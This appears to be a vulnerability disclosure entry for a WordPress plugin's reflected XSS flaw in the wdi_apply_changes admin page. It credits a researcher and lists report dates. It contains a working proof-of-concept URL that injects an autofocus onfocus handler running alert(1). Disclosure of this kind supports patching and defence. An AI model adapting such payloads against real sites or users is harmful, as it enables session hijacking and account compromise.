The plugin was affected by a reflected Cross-Site Scripting (XSS) vulnerability in the wdi_apply_changes admin page, allowing an attacker to perform such attack against any logged in users
https://example.com/wp-admin/admin-ajax.php?action=wdi_apply_changes&page=%22%20id=x%20tabindex=1%20onfocus=alert(1)%20autofocus=#x
Krzysztof Zając
Krzysztof Zając
Yes
2021-12-07 (about 1 years ago)
2021-12-07 (about 1 years ago)
2022-04-08 (about 9 months ago)